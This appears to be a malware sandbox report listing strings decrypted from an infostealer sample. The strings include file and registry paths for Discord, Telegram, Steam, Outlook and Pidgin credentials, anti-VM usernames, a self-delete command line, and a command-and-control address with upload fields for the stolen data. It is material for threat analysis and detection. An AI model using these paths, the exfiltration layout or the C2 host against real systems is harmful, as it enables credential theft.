Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: System Summary:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - HWID:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - OS:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Architecture:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - UserName:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Computer Name:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Local Time:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - UTC:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Language:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Keyboards:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Laptop:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Running Path:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - CPU:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Threads:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Cores:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - RAM:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - Display Resolution:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: - GPU:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: User Agents:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Installed Apps:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: All Users:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Current User:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Process List:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: system_info.txt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: freebl3.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: mozglue.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: msvcp140.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: nss3.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: softokn3.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: vcruntime140.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \Temp\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: .exe
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: runas
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: open
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: /c start
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %DESKTOP%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %APPDATA%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %USERPROFILE%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %DOCUMENTS%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %PROGRAMFILES%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %PROGRAMFILES_86%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %RECENT%
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: *.lnk
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: files
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \discord\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \Local Storage\leveldb
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \Telegram Desktop\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: key_datas
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: D877F783D5D3EF8C*
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: map*
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: A7FDF864FBC10B77*
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: A92DAA6EA6F891F2*
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: F8806DD0C461824F*
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Telegram
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Tox
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: *.tox
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: *.ini
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Password
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 00000001
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 00000002
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 00000003
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: 00000004
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \Outlook\accounts.txt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Pidgin
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \.purple\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: accounts.xml
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: dQw4w9WgXcQ
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: token:
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Software\Valve\Steam
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SteamPath
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \config\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ssfn*
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: config.vdf
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DialogConfig.vdf
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: libraryfolders.vdf
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: loginusers.vdf
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \Steam\
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sqlite3.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: browsers
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: done
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: soft
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: \Discord\tokens.txt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: https
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: POST
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HTTP/1.1
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Content-Disposition: form-data; name="
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: hwid
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: build
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: token
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: file_name
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: file
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: message
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: screenshot.jpg
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetProcAddress
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: LoadLibraryA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrcatA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: OpenEventA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateEventA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CloseHandle
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Sleep
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetSystemInfo
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HeapAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetComputerNameA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrcpyA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetProcessHeap
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetCurrentProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrlenA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ExitProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetSystemTime
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: advapi32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: gdi32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: user32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: crypt32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ntdll.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetUserNameA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateDCA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetDeviceCaps
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ReleaseDC
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: sscanf
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VMwareVMware
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HAL9TH
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: JohnDoe
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DISPLAY
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: http://193.143.1.226
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: /129edec4272dc2c8.php
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: /cdb52cf952e86d4b/
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: newpakistan
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetFileAttributesA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalLock
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HeapFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetFileSize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalSize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: IsWow64Process
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Process32Next
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLocalTime
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FreeLibrary
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetVolumeInformationA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: Process32First
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLocaleInfoA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetModuleFileNameA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DeleteFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FindNextFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: LocalFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FindClose
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: LocalAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetFileSizeEx
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ReadFile
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SetFilePointer
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: WriteFile
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: FindFirstFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CopyFileA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: VirtualProtect
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetLastError
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: lstrcpynA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: MultiByteToWideChar
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: WideCharToMultiByte
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GlobalAlloc
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: OpenProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: TerminateProcess
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetCurrentProcessId
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: gdiplus.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ole32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: bcrypt.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: wininet.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: shlwapi.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: shell32.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: psapi.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: rstrtmgr.dll
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SelectObject
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BitBlt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: DeleteObject
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateCompatibleDC
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdiplusStartup
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdiplusShutdown
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipDisposeImage
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GdipFree
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CoUninitialize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CoInitialize
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CoCreateInstance
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptDecrypt
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptSetProperty
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptDestroyKey
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetWindowRect
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetDesktopWindow
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetDC
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CloseWindow
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: wsprintfA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CharToOemW
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: wsprintfW
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegQueryValueExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegEnumKeyExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegOpenKeyExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegCloseKey
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: RegEnumValueA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: CryptUnprotectData
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: SHGetFolderPathA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: ShellExecuteExA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetOpenUrlA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetConnectA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetCloseHandle
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetOpenA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HttpSendRequestA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: HttpOpenRequestA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetReadFile
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: InternetCrackUrlA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: StrCmpCA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: StrStrA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: StrCmpCW
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: PathMatchSpecA
Source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack String decryptor: GetModuleFileNameExA
Source: LisectAVT_2403002A_326.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: BitLockerToGo.pdb source: LisectAVT_2403002A_326.exe, LisectAVT_2403002A_326.exe, 00000000.00000003.1860143166.00000225FA9F0000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889291210.000000C000B86000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889998486.000000C000D6F000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: BitLockerToGo.pdbGCTL source: LisectAVT_2403002A_326.exe, 00000000.00000003.1860143166.00000225FA9F0000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889291210.000000C000B86000.00000004.00001000.00020000.00000000.sdmp, LisectAVT_2403002A_326.exe, 00000000.00000002.1889998486.000000C000D6F000.00000004.00001000.00020000.00000000.sdmp
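
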